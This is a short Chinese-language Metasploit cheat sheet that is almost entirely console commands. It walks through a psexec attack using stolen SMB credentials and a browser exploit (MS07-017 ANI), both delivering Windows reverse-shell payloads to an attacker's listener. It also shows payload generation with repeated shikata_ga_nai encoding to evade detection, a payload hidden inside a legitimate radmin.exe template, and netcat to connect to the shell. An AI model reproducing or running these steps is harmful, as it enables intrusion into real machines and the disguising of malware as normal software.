exploit分类
Active exploit
示例:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 192.168.1.100
rhost => 192.168.1.100
msf exploit(psexec) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(psexec) > set lhost 192.168.1.1
lhost => 192.168.1.1
msf exploit(psexec) > set lport 4444
lport => 4444
msf exploit(psexec) > set smbuser user1 #需要客户机账户名
smbuser => user1
msf exploit(psexec) > set smbpass pass1 #需要客户机密码
smbpass => pass1
msf exploit(psexec) > exploit
Passive exploit
示例:
msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize ##引导点击网址漏洞
msf exploit(ms07_017_ani_loadimage_chunksize) > set srvhost 192.168.1.100
srvhost => 192.168.1.100
msf exploit(ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms07_017_ani_loadimage_chunksize) > set lhost 192.168.1.1
lhost => 192.168.1.1
msf exploit(ms07_017_ani_loadimage_chunksize) > set lport 4444
lport => 4444
msf exploit(ms07_017_ani_loadimage_chunksize) > exploit
生成payload
msf payload(shell_bind_tcp) > generate #生成payload(RB语言)
msf payload(shell_bind_tcp) > generate -b '\x00' #过滤坏字符(编码方式)
msf > show encoders #显示编码方式
msf payload(shell_bind_tcp) > generate -e php/base64 #手动指定编码方式
payload示例
msf payload(shell_bind_tcp) > generate -b 'x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /user/share/windows-binaries/radmin.exe -f /root/1.exe
#-b 排除坏字符
#-t 生成文件类型
#-e 使用编码方式
#-i 编码次数
#-k 隐蔽运营
#-x 使用正常文件模板(正常运行程序)
#-f 输出文件
控制机
nc 192.168.1.100 4444
NOP(字节滑动)
no-operation / Next Operation(无任何操作)
generate -s 14 #插入14个NOP
generate -t c #C语言格式